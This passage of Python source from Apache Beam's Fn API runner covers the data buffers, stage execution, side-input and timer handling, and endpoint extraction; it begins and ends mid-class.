DONE_STATE = 'done' class DoneMarker(object): pass _DONE_MARKER = DoneMarker() def __init__(self): self._lock = threading.Lock() self._uid_counter = 0 self._state = self.UNSTARTED_STATE # following self._req_* variables are used for debugging purpose, data is # added only when self._log_req is True. self._req_sent = collections.defaultdict(int) self._req_worker_mapping = {} self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG self._connections_by_worker_id = collections.defaultdict( ControlConnection) # type: DefaultDict[str, ControlConnection] def get_conn_by_worker_id(self, worker_id): # type: (str) -> ControlConnection with self._lock: return self._connections_by_worker_id[worker_id] def Control(self, iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse] context ): # type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest] with self._lock: if self._state == self.DONE_STATE: return else: self._state = self.STARTED_STATE worker_id = dict(context.invocation_metadata()).get('worker_id') if not worker_id: raise RuntimeError( 'All workers communicate through gRPC should have ' 'worker_id. 
Received None.') control_conn = self.get_conn_by_worker_id(worker_id) control_conn.set_input(iterator) while True: to_push = control_conn.get_req() if to_push is self._DONE_MARKER: return yield to_push if self._log_req: self._req_sent[to_push.instruction_id] += 1 def done(self): self._state = self.DONE_STATE _LOGGER.debug( 'Runner: Requests sent by runner: %s', [(str(req), cnt) for req, cnt in self._req_sent.items()]) _LOGGER.debug( 'Runner: Requests multiplexing info: %s', [(str(req), worker) for req, worker in self._req_worker_mapping.items()]) class Buffer(Protocol): def __iter__(self): # type: () -> Iterator[bytes] pass def append(self, item): # type: (bytes) -> None pass class PartitionableBuffer(Buffer, Protocol): def partition(self, n): # type: (int) -> List[List[bytes]] pass class _ListBuffer(): """Used to support parititioning of a list.""" def __init__(self, coder_impl): self._coder_impl = coder_impl self._inputs = [] # type: List[bytes] self._grouped_output = None self.cleared = False def append(self, element): # type: (bytes) -> None if self.cleared: raise RuntimeError('Trying to append to a cleared ListBuffer.') if self._grouped_output: raise RuntimeError('ListBuffer append after read.') self._inputs.append(element) def partition(self, n): # type: (int) -> List[List[bytes]] if self.cleared: raise RuntimeError('Trying to partition a cleared ListBuffer.') if len(self._inputs) >= n or len(self._inputs) == 0: return [self._inputs[k::n] for k in range(n)] else: if not self._grouped_output: output_stream_list = [create_OutputStream() for _ in range(n)] idx = 0 for input in self._inputs: input_stream = create_InputStream(input) while input_stream.size() > 0: decoded_value = self._coder_impl.decode_from_stream( input_stream, True) self._coder_impl.encode_to_stream( decoded_value, output_stream_list[idx], True) idx = (idx + 1) % n self._grouped_output = [[output_stream.get()] for output_stream in output_stream_list] return self._grouped_output def __iter__(self): # type: () -> Iterator[bytes] if self.cleared: raise RuntimeError('Trying to iterate through a cleared ListBuffer.') return iter(self._inputs) def clear(self): # type: () -> None self.cleared = True self._inputs = [] self._grouped_output = None class _GroupingBuffer(object): """Used to accumulate groupded (shuffled) results.""" def __init__(self, pre_grouped_coder, # type: coders.Coder post_grouped_coder, # type: coders.Coder windowing ): # type: (...) -> None self._key_coder = pre_grouped_coder.key_coder() self._pre_grouped_coder = pre_grouped_coder self._post_grouped_coder = post_grouped_coder self._table = collections.defaultdict( list) # type: DefaultDict[bytes, List[Any]] self._windowing = windowing self._grouped_output = None # type: Optional[List[List[bytes]]] def append(self, elements_data): # type: (bytes) -> None if self._grouped_output: raise RuntimeError('Grouping table append after read.') input_stream = create_InputStream(elements_data) coder_impl = self._pre_grouped_coder.get_impl() key_coder_impl = self._key_coder.get_impl() # TODO(robertwb): We could optimize this even more by using a # window-dropping coder for the data plane. is_trivial_windowing = self._windowing.is_default() while input_stream.size() > 0: windowed_key_value = coder_impl.decode_from_stream(input_stream, True) key, value = windowed_key_value.value self._table[key_coder_impl.encode(key)].append( value if is_trivial_windowing else windowed_key_value. 
with_value(value)) def partition(self, n): # type: (int) -> List[List[bytes]] """ It is used to partition _GroupingBuffer to N parts. Once it is partitioned, it would not be re-partitioned with diff N. Re-partition is not supported now. """ if not self._grouped_output: if self._windowing.is_default(): globally_window = GlobalWindows.windowed_value( None, timestamp=GlobalWindow().max_timestamp(), pane_info=windowed_value.PaneInfo( is_first=True, is_last=True, timing=windowed_value.PaneInfoTiming.ON_TIME, index=0, nonspeculative_index=0)).with_value windowed_key_values = lambda key, values: [ globally_window((key, values))] else: # TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock # note that this only comes through if windowing is default - but what # about having multiple firings on the global window. # May need to revise. trigger_driver = trigger.create_trigger_driver(self._windowing, True) windowed_key_values = trigger_driver.process_entire_key coder_impl = self._post_grouped_coder.get_impl() key_coder_impl = self._key_coder.get_impl() self._grouped_output = [[] for _ in range(n)] output_stream_list = [create_OutputStream() for _ in range(n)] for idx, (encoded_key, windowed_values) in enumerate(self._table.items()): key = key_coder_impl.decode(encoded_key) for wkvs in windowed_key_values(key, windowed_values): coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True) for ix, output_stream in enumerate(output_stream_list): self._grouped_output[ix] = [output_stream.get()] self._table.clear() return self._grouped_output def __iter__(self): # type: () -> Iterator[bytes] """ Since partition() returns a list of lists, add this __iter__ to return a list to simplify code when we need to iterate through ALL elements of _GroupingBuffer. """ return itertools.chain(*self.partition(1)) class _WindowGroupingBuffer(object): """Used to partition windowed side inputs.""" def __init__( self, access_pattern, coder # type: coders.WindowedValueCoder ): # type: (...) -> None # Here's where we would use a different type of partitioning # (e.g. also by key) for a different access pattern. 
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn: self._kv_extractor = lambda value: ('', value) self._key_coder = coders.SingletonCoder('') # type: coders.Coder self._value_coder = coder.wrapped_value_coder elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn: self._kv_extractor = lambda value: value self._key_coder = coder.wrapped_value_coder.key_coder() self._value_coder = (coder.wrapped_value_coder.value_coder()) else: raise ValueError("Unknown access pattern: '%s'" % access_pattern.urn) self._windowed_value_coder = coder self._window_coder = coder.window_coder self._values_by_window = collections.defaultdict( list) # type: DefaultDict[Tuple[str, BoundedWindow], List[Any]] def append(self, elements_data): # type: (bytes) -> None input_stream = create_InputStream(elements_data) while input_stream.size() > 0: windowed_val_coder_impl = self._windowed_value_coder.get_impl( ) # type: WindowedValueCoderImpl windowed_value = windowed_val_coder_impl.decode_from_stream( input_stream, True) key, value = self._kv_extractor(windowed_value.value) for window in windowed_value.windows: self._values_by_window[key, window].append(value) def encoded_items(self): # type: () -> Iterator[Tuple[bytes, bytes, bytes]] value_coder_impl = self._value_coder.get_impl() key_coder_impl = self._key_coder.get_impl() for (key, window), values in self._values_by_window.items(): encoded_window = self._window_coder.encode(window) encoded_key = key_coder_impl.encode_nested(key) output_stream = create_OutputStream() for value in values: value_coder_impl.encode_to_stream(value, output_stream, True) yield encoded_key, encoded_window, output_stream.get() class FnApiRunner(runner.PipelineRunner): def __init__( self, default_environment=None, # type: Optional[environments.Environment] bundle_repeat=0, use_state_iterables=False, provision_info=None, # type: Optional[ExtendedProvisionInfo] progress_request_frequency=None): # type: (...) -> None """Creates a new Fn API Runner. Args: default_environment: the default environment to use for UserFns. bundle_repeat: replay every bundle this many extra times, for profiling and debugging use_state_iterables: Intentionally split gbk iterables over state API (for testing) provision_info: provisioning info to make available to workers, or None progress_request_frequency: The frequency (in seconds) that the runner waits before requesting progress from the SDK. """ super(FnApiRunner, self).__init__() self._last_uid = -1 self._default_environment = ( default_environment or environments.EmbeddedPythonEnvironment()) self._bundle_repeat = bundle_repeat self._num_workers = 1 self._progress_frequency = progress_request_frequency self._profiler_factory = None # type: Optional[Callable[..., profiler.Profile]] self._use_state_iterables = use_state_iterables self._provision_info = provision_info or ExtendedProvisionInfo( beam_provision_api_pb2.ProvisionInfo( retrieval_token='unused-retrieval-token')) def _next_uid(self): self._last_uid += 1 return str(self._last_uid) @staticmethod def supported_requirements(): return ( common_urns.requirements.REQUIRES_STATEFUL_PROCESSING.urn, common_urns.requirements.REQUIRES_BUNDLE_FINALIZATION.urn, common_urns.requirements.REQUIRES_SPLITTABLE_DOFN.urn, ) def run_pipeline(self, pipeline, # type: Pipeline options # type: pipeline_options.PipelineOptions ): # type: (...) -> RunnerResult RuntimeValueProvider.set_runtime_options({}) # Setup "beam_fn_api" experiment options if lacked. 
experiments = ( options.view_as(pipeline_options.DebugOptions).experiments or []) if not 'beam_fn_api' in experiments: experiments.append('beam_fn_api') options.view_as(pipeline_options.DebugOptions).experiments = experiments # This is sometimes needed if type checking is disabled # to enforce that the inputs (and outputs) of GroupByKey operations # are known to be KVs. from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner # TODO: Move group_by_key_input_visitor() to a non-dataflow specific file. pipeline.visit(DataflowRunner.group_by_key_input_visitor()) self._bundle_repeat = self._bundle_repeat or options.view_as( pipeline_options.DirectOptions).direct_runner_bundle_repeat self._num_workers = options.view_as( pipeline_options.DirectOptions).direct_num_workers or self._num_workers # set direct workers running mode if it is defined with pipeline options. running_mode = \ options.view_as(pipeline_options.DirectOptions).direct_running_mode if running_mode == 'multi_threading': self._default_environment = environments.EmbeddedPythonGrpcEnvironment() elif running_mode == 'multi_processing': command_string = '%s -m apache_beam.runners.worker.sdk_worker_main' \ % sys.executable self._default_environment = environments.SubprocessSDKEnvironment( command_string=command_string) self._profiler_factory = profiler.Profile.factory_from_options( options.view_as(pipeline_options.ProfilingOptions)) self._latest_run_result = self.run_via_runner_api( pipeline.to_runner_api(default_environment=self._default_environment)) return self._latest_run_result def run_via_runner_api(self, pipeline_proto): # type: (beam_runner_api_pb2.Pipeline) -> RunnerResult self._validate_requirements(pipeline_proto) self._check_requirements(pipeline_proto) stage_context, stages = self.create_stages(pipeline_proto) # TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to # the teststream (if any), and all the stages). return self.run_stages(stage_context, stages) @contextlib.contextmanager def maybe_profile(self): if self._profiler_factory: try: profile_id = 'direct-' + subprocess.check_output([ 'git', 'rev-parse', '--abbrev-ref', 'HEAD' ]).decode(errors='ignore').strip() except subprocess.CalledProcessError: profile_id = 'direct-unknown' profiler = self._profiler_factory(profile_id, time_prefix='') else: profiler = None if profiler: with profiler: yield if not self._bundle_repeat: _LOGGER.warning( 'The --direct_runner_bundle_repeat option is not set; ' 'a significant portion of the profile may be one-time overhead.') path = profiler.profile_output print('CPU Profile written to %s' % path) try: import gprof2dot # pylint: disable=unused-import if not subprocess.call([sys.executable, '-m', 'gprof2dot', '-f', 'pstats', path, '-o', path + '.dot']): if not subprocess.call( ['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']): print( 'CPU Profile rendering at file://%s.svg' % os.path.abspath(path)) except ImportError: # pylint: disable=superfluous-parens print('Please install gprof2dot and dot for profile renderings.') else: # Empty context. 
yield def _validate_requirements(self, pipeline_proto): """As a test runner, validate requirements were set correctly.""" expected_requirements = set() def add_requirements(transform_id): transform = pipeline_proto.components.transforms[transform_id] if transform.spec.urn in translations.PAR_DO_URNS: payload = proto_utils.parse_Bytes( transform.spec.payload, beam_runner_api_pb2.ParDoPayload) if payload.requests_finalization: expected_requirements.add( common_urns.requirements.REQUIRES_BUNDLE_FINALIZATION.urn) if (payload.state_specs or payload.timer_specs or payload.timer_family_specs): expected_requirements.add( common_urns.requirements.REQUIRES_STATEFUL_PROCESSING.urn) if payload.requires_stable_input: expected_requirements.add( common_urns.requirements.REQUIRES_STABLE_INPUT.urn) if payload.requires_time_sorted_input: expected_requirements.add( common_urns.requirements.REQUIRES_TIME_SORTED_INPUT.urn) if payload.restriction_coder_id: expected_requirements.add( common_urns.requirements.REQUIRES_SPLITTABLE_DOFN.urn) else: for sub in transform.subtransforms: add_requirements(sub) for root in pipeline_proto.root_transform_ids: add_requirements(root) if not expected_requirements.issubset(pipeline_proto.requirements): raise ValueError( 'Missing requirement declaration: %s' % (expected_requirements - set(pipeline_proto.requirements))) def _check_requirements(self, pipeline_proto): """Check that this runner can satisfy all pipeline requirements.""" supported_requirements = set(self.supported_requirements()) for requirement in pipeline_proto.requirements: if requirement not in supported_requirements: raise ValueError( 'Unable to run pipeline with requirement: %s' % requirement) def create_stages( self, pipeline_proto # type: beam_runner_api_pb2.Pipeline ): # type: (...) -> Tuple[translations.TransformContext, List[translations.Stage]] return translations.create_and_optimize_stages( copy.deepcopy(pipeline_proto), phases=[ translations.annotate_downstream_side_inputs, translations.fix_side_input_pcoll_coders, translations.lift_combiners, translations.expand_sdf, translations.expand_gbk, translations.sink_flattens, translations.greedily_fuse, translations.read_to_impulse, translations.impulse_to_input, translations.inject_timer_pcollections, translations.sort_stages, translations.window_pcollection_coders ], known_runner_urns=frozenset([ common_urns.primitives.FLATTEN.urn, common_urns.primitives.GROUP_BY_KEY.urn ]), use_state_iterables=self._use_state_iterables) def run_stages(self, stage_context, # type: translations.TransformContext stages # type: List[translations.Stage] ): # type: (...) -> RunnerResult """Run a list of topologically-sorted stages in batch mode. 
Args: stage_context (translations.TransformContext) stages (list[fn_api_runner.translations.Stage]) """ worker_handler_manager = WorkerHandlerManager( stage_context.components.environments, self._provision_info) metrics_by_stage = {} monitoring_infos_by_stage = {} try: with self.maybe_profile(): pcoll_buffers = {} # type: Dict[bytes, PartitionableBuffer] for stage in stages: stage_results = self._run_stage( worker_handler_manager.get_worker_handlers, stage_context.components, stage, pcoll_buffers, stage_context.safe_coders) metrics_by_stage[stage.name] = stage_results.process_bundle.metrics monitoring_infos_by_stage[stage.name] = ( stage_results.process_bundle.monitoring_infos) finally: worker_handler_manager.close_all() return RunnerResult( runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage) def _store_side_inputs_in_state(self, worker_handler, # type: WorkerHandler context, # type: pipeline_context.PipelineContext pipeline_components, # type: beam_runner_api_pb2.Components data_side_input, # type: DataSideInput pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] safe_coders ): # type: (...) -> None for (transform_id, tag), (buffer_id, si) in data_side_input.items(): _, pcoll_id = split_buffer_id(buffer_id) value_coder = context.coders[safe_coders[ pipeline_components.pcollections[pcoll_id].coder_id]] elements_by_window = _WindowGroupingBuffer(si, value_coder) if buffer_id not in pcoll_buffers: pcoll_buffers[buffer_id] = _ListBuffer( coder_impl=value_coder.get_impl()) for element_data in pcoll_buffers[buffer_id]: elements_by_window.append(element_data) if si.urn == common_urns.side_inputs.ITERABLE.urn: for _, window, elements_data in elements_by_window.encoded_items(): state_key = beam_fn_api_pb2.StateKey( iterable_side_input=beam_fn_api_pb2.StateKey.IterableSideInput( transform_id=transform_id, side_input_id=tag, window=window)) worker_handler.state.append_raw(state_key, elements_data) elif si.urn == common_urns.side_inputs.MULTIMAP.urn: for key, window, elements_data in elements_by_window.encoded_items(): state_key = beam_fn_api_pb2.StateKey( multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput( transform_id=transform_id, side_input_id=tag, window=window, key=key)) worker_handler.state.append_raw(state_key, elements_data) else: raise ValueError("Unknown access pattern: '%s'" % si.urn) def _run_bundle_multiple_times_for_testing( self, worker_handler_list, # type: Sequence[WorkerHandler] process_bundle_descriptor, data_input, data_output, # type: DataOutput get_input_coder_callable, cache_token_generator ): # type: (...) -> None """ If bundle_repeat > 0, replay every bundle for profiling and debugging. """ # all workers share state, so use any worker_handler. 
worker_handler = worker_handler_list[0] for k in range(self._bundle_repeat): try: worker_handler.state.checkpoint() testing_bundle_manager = ParallelBundleManager( worker_handler_list, lambda pcoll_id, transform_id: _ListBuffer(coder_impl=get_input_coder_callable), get_input_coder_callable, process_bundle_descriptor, self._progress_frequency, k, num_workers=self._num_workers, cache_token_generator=cache_token_generator) testing_bundle_manager.process_bundle(data_input, data_output) finally: worker_handler.state.restore() def _collect_written_timers_and_add_to_deferred_inputs( self, context, # type: pipeline_context.PipelineContext pipeline_components, # type: beam_runner_api_pb2.Components stage, # type: translations.Stage get_buffer_callable, deferred_inputs # type: MutableMapping[str, PartitionableBuffer] ): # type: (...) -> None for transform_id, timer_writes in stage.timer_pcollections: # Queue any set timers as new inputs. windowed_timer_coder_impl = context.coders[ pipeline_components.pcollections[timer_writes].coder_id].get_impl() written_timers = get_buffer_callable( create_buffer_id(timer_writes, kind='timers'), transform_id) if not written_timers.cleared: # Keep only the "last" timer set per key and window. timers_by_key_and_window = {} for elements_data in written_timers: input_stream = create_InputStream(elements_data) while input_stream.size() > 0: windowed_key_timer = windowed_timer_coder_impl.decode_from_stream( input_stream, True) key, _ = windowed_key_timer.value # TODO: Explode and merge windows. assert len(windowed_key_timer.windows) == 1 timers_by_key_and_window[ key, windowed_key_timer.windows[0]] = windowed_key_timer out = create_OutputStream() for windowed_key_timer in timers_by_key_and_window.values(): windowed_timer_coder_impl.encode_to_stream( windowed_key_timer, out, True) deferred_inputs[transform_id] = _ListBuffer( coder_impl=windowed_timer_coder_impl) deferred_inputs[transform_id].append(out.get()) written_timers.clear() def _add_residuals_and_channel_splits_to_deferred_inputs( self, splits, # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] get_input_coder_impl_callable, input_for_callable, last_sent, deferred_inputs # type: MutableMapping[str, PartitionableBuffer] ): # type: (...) -> None prev_stops = {} # type: Dict[str, int] for split in splits: for delayed_application in split.residual_roots: name = input_for_callable( delayed_application.application.transform_id, delayed_application.application.input_id) if name not in deferred_inputs: deferred_inputs[name] = _ListBuffer( coder_impl=get_input_coder_impl_callable(name)) deferred_inputs[name].append(delayed_application.application.element) for channel_split in split.channel_splits: coder_impl = get_input_coder_impl_callable(channel_split.transform_id) # TODO(SDF): This requires determanistic ordering of buffer iteration. # TODO(SDF): The return split is in terms of indices. Ideally, # a runner could map these back to actual positions to effectively # describe the two "halves" of the now-split range. Even if we have # to buffer each element we send (or at the very least a bit of # metadata, like position, about each of them) this should be doable # if they're already in memory and we are bounding the buffer size # (e.g. to 10mb plus whatever is eagerly read from the SDK). In the # case of non-split-points, we can either immediately replay the # "non-split-position" elements or record them as we do the other # delayed applications. # Decode and recode to split the encoded buffer by element index. 
all_elements = list( coder_impl.decode_all( b''.join(last_sent[channel_split.transform_id]))) residual_elements = all_elements[ channel_split.first_residual_element:prev_stops. get(channel_split.transform_id, len(all_elements)) + 1] if residual_elements: if channel_split.transform_id not in deferred_inputs: coder_impl = get_input_coder_impl_callable( channel_split.transform_id) deferred_inputs[channel_split.transform_id] = _ListBuffer( coder_impl=coder_impl) deferred_inputs[channel_split.transform_id].append( coder_impl.encode_all(residual_elements)) prev_stops[ channel_split.transform_id] = channel_split.last_primary_element @staticmethod def _extract_stage_data_endpoints( stage, # type: translations.Stage pipeline_components, # type: beam_runner_api_pb2.Components data_api_service_descriptor, pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] safe_coders ): # type: (...) -> Tuple[Dict[Tuple[str, str], PartitionableBuffer], DataSideInput, Dict[Tuple[str, str], bytes]] # Returns maps of transform names to PCollection identifiers. # Also mutates IO stages to point to the data ApiServiceDescriptor. data_input = {} # type: Dict[Tuple[str, str], PartitionableBuffer] data_side_input = {} # type: DataSideInput data_output = {} # type: Dict[Tuple[str, str], bytes] for transform in stage.transforms: if transform.spec.urn in (bundle_processor.DATA_INPUT_URN, bundle_processor.DATA_OUTPUT_URN): pcoll_id = transform.spec.payload if transform.spec.urn == bundle_processor.DATA_INPUT_URN: target = transform.unique_name, only_element(transform.outputs) coder_id = pipeline_components.pcollections[only_element( transform.outputs.values())].coder_id if coder_id in stage.context.coders[safe_coders[coder_id]]: coder = stage.context.coders[safe_coders[coder_id]] else: coder = stage.context.coders[coder_id] if pcoll_id == translations.IMPULSE_BUFFER: data_input[target] = _ListBuffer(coder_impl=coder.get_impl()) data_input[target].append(ENCODED_IMPULSE_VALUE) else: if pcoll_id not in pcoll_buffers: data_input[target] = _ListBuffer(coder_impl=coder.get_impl()) data_input[target] = pcoll_buffers[pcoll_id] elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN: target = transform.unique_name, only_element(transform.inputs) data_output[target] = pcoll_id coder_id = pipeline_components.pcollections[only_element( transform.inputs.values())].coder_id else: raise NotImplementedError data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id) if data_api_service_descriptor: data_spec.api_service_descriptor.url = ( data_api_service_descriptor.url) transform.spec.payload = data_spec.SerializeToString() elif transform.spec.urn in translations.PAR_DO_URNS: payload = proto_utils.parse_Bytes( transform.spec.payload, beam_runner_api_pb2.ParDoPayload) for tag, si in payload.side_inputs.items(): data_side_input[transform.unique_name, tag] = ( create_buffer_id(transform.inputs[tag]), si.access_pattern) return data_input, data_side_input, data_output def _run_stage(self, worker_handler_factory, # type: Callable[[Optional[str], int], List[WorkerHandler]] pipeline_components, # type: beam_runner_api_pb2.Components stage, # type: translations.Stage pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] safe_coders ): # type: (...) -> beam_fn_api_pb2.InstructionResponse """Run an individual stage. Args: worker_handler_factory: A ``callable`` that takes in an environment id and a number of workers, and returns a list of ``WorkerHandler``s. 
pipeline_components (beam_runner_api_pb2.Components): TODO stage (translations.Stage) pcoll_buffers (collections.defaultdict of str: list): Mapping of PCollection IDs to list that functions as buffer for the ``beam.PCollection``. safe_coders (dict): TODO """ def iterable_state_write(values, element_coder_impl): # type: (...) -> bytes token = unique_name(None, 'iter').encode('ascii') out = create_OutputStream() for element in values: element_coder_impl.encode_to_stream(element, out, True) worker_handler.state.append_raw( beam_fn_api_pb2.StateKey( runner=beam_fn_api_pb2.StateKey.Runner(key=token)), out.get()) return token worker_handler_list = worker_handler_factory( stage.environment, self._num_workers) # All worker_handlers share the same grpc server, so we can read grpc server # info from any worker_handler and read from the first worker_handler. worker_handler = next(iter(worker_handler_list)) context = pipeline_context.PipelineContext( pipeline_components, iterable_state_write=iterable_state_write) data_api_service_descriptor = worker_handler.data_api_service_descriptor() _LOGGER.info('Running %s', stage.name) data_input, data_side_input, data_output = self._extract_endpoints( stage, pipeline_components, data_api_service_descriptor, pcoll_buffers, context, safe_coders) process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor( id=self._next_uid(), transforms={ transform.unique_name: transform for transform in stage.transforms }, pcollections=dict(pipeline_components.pcollections.items()), coders=dict(pipeline_components.coders.items()), windowing_strategies=dict( pipeline_components.windowing_strategies.items()), environments=dict(pipeline_components.environments.items())) state_api_service_descriptor = worker_handler.state_api_service_descriptor() if state_api_service_descriptor: process_bundle_descriptor.state_api_service_descriptor.url = ( state_api_service_descriptor.url) # Store the required side inputs into state so it is accessible for the # worker when it runs this bundle. self._store_side_inputs_in_state( worker_handler, context, pipeline_components, data_side_input, pcoll_buffers, safe_coders) def get_buffer(buffer_id, transform_id): # type: (bytes, str) -> PartitionableBuffer """Returns the buffer for a given (operation_type, PCollection ID). For grouping-typed operations, we produce a ``_GroupingBuffer``. For others, we produce a ``_ListBuffer``. """ kind, name = split_buffer_id(buffer_id) if kind in ('materialize', 'timers'): if buffer_id not in pcoll_buffers: pcoll_buffers[buffer_id] = _ListBuffer( coder_impl=get_input_coder_impl(transform_id)) return pcoll_buffers[buffer_id] elif kind == 'group': # This is a grouping write, create a grouping buffer if needed. if buffer_id not in pcoll_buffers: original_gbk_transform = name transform_proto = pipeline_components.transforms[ original_gbk_transform] input_pcoll = only_element(list(transform_proto.inputs.values())) output_pcoll = only_element(list(transform_proto.outputs.values())) pre_gbk_coder = context.coders[safe_coders[ pipeline_components.pcollections[input_pcoll].coder_id]] post_gbk_coder = context.coders[safe_coders[ pipeline_components.pcollections[output_pcoll].coder_id]] windowing_strategy = context.windowing_strategies[ pipeline_components.pcollections[output_pcoll]. windowing_strategy_id] pcoll_buffers[buffer_id] = _GroupingBuffer( pre_gbk_coder, post_gbk_coder, windowing_strategy) else: # These should be the only two identifiers we produce for now, # but special side input writes may go here. 
raise NotImplementedError(buffer_id) return pcoll_buffers[buffer_id] def get_input_coder_impl(transform_id): # type: (str) -> CoderImpl coder_id = beam_fn_api_pb2.RemoteGrpcPort.FromString( process_bundle_descriptor.transforms[transform_id].spec.payload ).coder_id assert coder_id if coder_id in safe_coders: return context.coders[safe_coders[coder_id]].get_impl() else: return context.coders[coder_id].get_impl() # Change cache token across bundle repeats cache_token_generator = FnApiRunner.get_cache_token_generator(static=False) self._run_bundle_multiple_times_for_testing( worker_handler_list, process_bundle_descriptor, data_input, data_output, get_input_coder_impl, cache_token_generator=cache_token_generator) bundle_manager = ParallelBundleManager( worker_handler_list, get_buffer, get_input_coder_impl, process_bundle_descriptor, self._progress_frequency, num_workers=self._num_workers, cache_token_generator=cache_token_generator) result, splits = bundle_manager.process_bundle(data_input, data_output) def input_for(transform_id, input_id): # type: (str, str) -> str input_pcoll = process_bundle_descriptor.transforms[transform_id].inputs[ input_id] for read_id, proto in process_bundle_descriptor.transforms.items(): if (proto.spec.urn == bundle_processor.DATA_INPUT_URN and input_pcoll in proto.outputs.values()): return read_id raise RuntimeError('No IO transform feeds %s' % transform_id) last_result = result last_sent = data_input # We cannot split deferred_input until we include residual_roots to # merged results. Without residual_roots, pipeline stops earlier and we # may miss some data. bundle_manager._num_workers = 1 while True: deferred_inputs = {} # type: Dict[str, PartitionableBuffer] self._collect_written_timers_and_add_to_deferred_inputs( context, pipeline_components, stage, get_buffer, deferred_inputs) # Queue any process-initiated delayed bundle applications. for delayed_application in last_result.process_bundle.residual_roots: name = input_for( delayed_application.application.transform_id, delayed_application.application.input_id) if name not in deferred_inputs: deferred_inputs[name] = _ListBuffer( coder_impl=get_input_coder_impl(name)) deferred_inputs[name].append(delayed_application.application.element) # Queue any runner-initiated delayed bundle applications. self._add_residuals_and_channel_splits_to_deferred_inputs( splits, get_input_coder_impl, input_for, last_sent, deferred_inputs) if deferred_inputs: # The worker will be waiting on these inputs as well. 
for other_input in data_input: if other_input not in deferred_inputs: deferred_inputs[other_input] = _ListBuffer( coder_impl=get_input_coder_impl(other_input)) # TODO(robertwb): merge results # TODO(BEAM-8486): this should be changed to _registered bundle_manager._skip_registration = True # type: ignore[attr-defined] last_result, splits = bundle_manager.process_bundle( deferred_inputs, data_output) last_sent = deferred_inputs result = beam_fn_api_pb2.InstructionResponse( process_bundle=beam_fn_api_pb2.ProcessBundleResponse( monitoring_infos=monitoring_infos.consolidate( itertools.chain( result.process_bundle.monitoring_infos, last_result.process_bundle.monitoring_infos))), error=result.error or last_result.error) else: break return result @staticmethod def _extract_endpoints(stage, # type: translations.Stage pipeline_components, # type: beam_runner_api_pb2.Components data_api_service_descriptor, # type: Optional[endpoints_pb2.ApiServiceDescriptor] pcoll_buffers, # type: MutableMapping[bytes, PartitionableBuffer] context, safe_coders ): # type: (...) -> Tuple[Dict[str, PartitionableBuffer], DataSideInput, DataOutput] """Returns maps of transform names to PCollection identifiers. Also mutates IO stages to point to the data ApiServiceDescriptor. Args: stage (translations.Stage): The stage to extract endpoints for. pipeline_components (beam_runner_api_pb2.Components): Components of the pipeline to include coders, transforms, PCollections, etc. data_api_service_descriptor: A GRPC endpoint descriptor for data plane. pcoll_buffers (dict): A dictionary containing buffers for PCollection elements. Returns: A tuple of (data_input, data_side_input, data_output) dictionaries. `data_input` is a dictionary mapping (transform_name, output_name) to a PCollection buffer; `data_output` is a dictionary mapping (transform_name, output_name) to a PCollection ID. 
""" data_input = {} # type: Dict[str, PartitionableBuffer] data_side_input = {} # type: DataSideInput data_output = {} # type: DataOutput for transform in stage.transforms: if transform.spec.urn in (bundle_processor.DATA_INPUT_URN, bundle_processor.DATA_OUTPUT_URN): pcoll_id = transform.spec.payload if transform.spec.urn == bundle_processor.DATA_INPUT_URN: coder_id = pipeline_components.pcollections[only_element( transform.outputs.values())].coder_id if coder_id in safe_coders: coder = context.coders[safe_coders[coder_id]] else: coder = context.coders[coder_id] if pcoll_id == translations.IMPULSE_BUFFER: data_input[transform.unique_name] = _ListBuffer( coder_impl=coder.get_impl()) data_input[transform.unique_name].append(ENCODED_IMPULSE_VALUE) else: if pcoll_id not in pcoll_buffers: pcoll_buffers[pcoll_id] = _ListBuffer(coder_impl=coder.get_impl()) data_input[transform.unique_name] = pcoll_buffers[pcoll_id] elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN: data_output[transform.unique_name] = pcoll_id coder_id = pipeline_components.pcollections[only_element( transform.inputs.values())].coder_id else: raise NotImplementedError data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id) if data_api_service_descriptor: data_spec.api_service_descriptor.url = ( data_api_service_descriptor.url) transform.spec.payload = data_spec.SerializeToString() elif transform.spec.urn in translations.PAR_DO_URNS: payload = proto_utils.parse_Bytes( transform.spec.payload, beam_runner_api_pb2.ParDoPayload) for tag, si in payload.side_inputs.items(): data_side_input[transform.unique_name, tag] = ( create_buffer_id(transform.inputs[tag]), si.access_pattern) return data_input, data_side_input, data_output # These classes are used to interact with the worker. class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer, sdk_worker.StateHandler): class CopyOnWriteState(object): def __init__(self, underlying): # type: (DefaultDict[bytes, Buffer]) -> None self._underlying = underlying self._overlay = {} # type: Dict[bytes, Buffer] def __getitem__(self, key): # type: (bytes) -> Buffer if key in self._overlay: return self._overlay[key] else: return FnApiRunner.StateServicer.CopyOnWriteList( self._underlying, self._overlay, key) def __delitem__(self, key): # type: (bytes) -> None self._overlay[key] = [] def commit(self): # type: () -> DefaultDict[bytes, Buffer] self._underlying.update(self._overlay) return self._underlying class CopyOnWriteList(object): def __init__(self, underlying, # type: DefaultDict[bytes, Buffer] overlay, # type: Dict[bytes, Buffer] key # type: bytes ): # type: (...) 
